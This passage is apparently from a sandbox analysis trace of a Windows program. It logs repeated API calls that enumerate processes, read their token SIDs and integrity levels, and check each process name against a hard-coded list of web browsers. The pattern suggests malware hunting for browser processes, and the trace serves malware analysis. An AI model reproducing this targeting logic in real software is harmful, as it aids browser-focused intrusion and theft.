(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0494.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0494.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0494.584] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0494.584] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0494.584] GetLastError () returned 0x7a [0494.584] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0494.584] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0494.584] CloseHandle (hObject=0x3bc) returned 1 [0494.584] CloseHandle (hObject=0x5a4) returned 1 [0494.584] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0494.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0494.584] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x98") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0494.584] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0494.584] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0494.584] GetLastError () returned 0x7a [0494.584] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0494.584] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0494.584] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0494.584] CloseHandle (hObject=0x3bc) returned 1 [0494.584] CloseHandle (hObject=0x5a4) returned 1 [0494.585] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0494.585] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0494.585] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0494.585] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0494.585] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0494.585] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0494.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0494.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0494.585] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0494.585] GetLastError () returned 0x7a [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0494.585] CloseHandle (hObject=0x3bc) returned 1 [0494.585] CloseHandle (hObject=0x5a4) returned 1 [0494.585] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0494.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0494.585] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x99") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0494.585] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0494.585] GetLastError () returned 0x7a [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0494.585] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0494.585] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0494.585] CloseHandle (hObject=0x3bc) returned 1 [0494.585] CloseHandle (hObject=0x5a4) returned 1 [0494.585] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0494.585] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0494.585] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0494.585] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0494.585] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0494.585] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0494.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0494.585] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0494.585] GetLastError () returned 0x7a [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0494.585] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0494.586] CloseHandle (hObject=0x3bc) returned 1 [0494.586] CloseHandle (hObject=0x5a4) returned 1 [0494.586] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0494.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0494.586] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9a") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0494.586] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0494.586] GetLastError () returned 0x7a [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0494.586] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0494.586] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0494.586] CloseHandle (hObject=0x3bc) returned 1 [0494.586] CloseHandle (hObject=0x5a4) returned 1 [0494.586] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0494.586] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0494.586] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0494.586] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0494.586] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0494.586] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0494.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0494.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0494.586] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0494.586] GetLastError () returned 0x7a [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0494.586] CloseHandle (hObject=0x3bc) returned 1 [0494.586] CloseHandle (hObject=0x5a4) returned 1 [0494.586] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0494.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0494.586] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9b") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0494.586] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0494.586] GetLastError () returned 0x7a [0494.586] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0494.586] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0494.586] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0494.586] CloseHandle (hObject=0x3bc) returned 1 [0494.586] CloseHandle (hObject=0x5a4) returned 1 [0494.587] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0494.587] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0494.587] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0494.587] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0494.587] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0494.587] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0494.587] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0494.587] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0494.587] GetLastError () returned 0x7a [0494.587] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0494.587] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0494.587] CloseHandle (hObject=0x3bc) returned 1 [0494.587] CloseHandle (hObject=0x5a4) returned 1 [0494.587] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0494.587] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9c") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0494.587] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0494.587] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0494.587] GetLastError () returned 0x7a [0494.587] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0494.587] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0494.587] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0494.587] CloseHandle (hObject=0x3bc) returned 1 [0494.587] CloseHandle (hObject=0x5a4) returned 1 [0494.587] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0494.587] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0494.587] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0494.587] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0494.587] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0494.587] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0494.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0494.587] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0494.588] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0496.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0496.587] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0496.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0496.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0496.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0496.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0496.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0496.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0496.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0496.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0496.591] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0496.591] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0496.591] GetLastError () returned 0x7a [0496.591] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0496.592] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0496.592] CloseHandle (hObject=0x3bc) returned 1 [0496.592] CloseHandle (hObject=0x5a4) returned 1 [0496.592] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0496.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0496.592] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9d") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0496.592] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0496.592] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0496.592] GetLastError () returned 0x7a [0496.592] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0496.592] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0496.592] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0496.592] CloseHandle (hObject=0x3bc) returned 1 [0496.592] CloseHandle (hObject=0x5a4) returned 1 [0496.592] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0496.592] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0496.592] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0496.592] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0496.593] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0496.593] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0496.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0496.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0496.593] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0496.593] GetLastError () returned 0x7a [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0496.593] CloseHandle (hObject=0x3bc) returned 1 [0496.593] CloseHandle (hObject=0x5a4) returned 1 [0496.593] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0496.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0496.593] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9e") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, 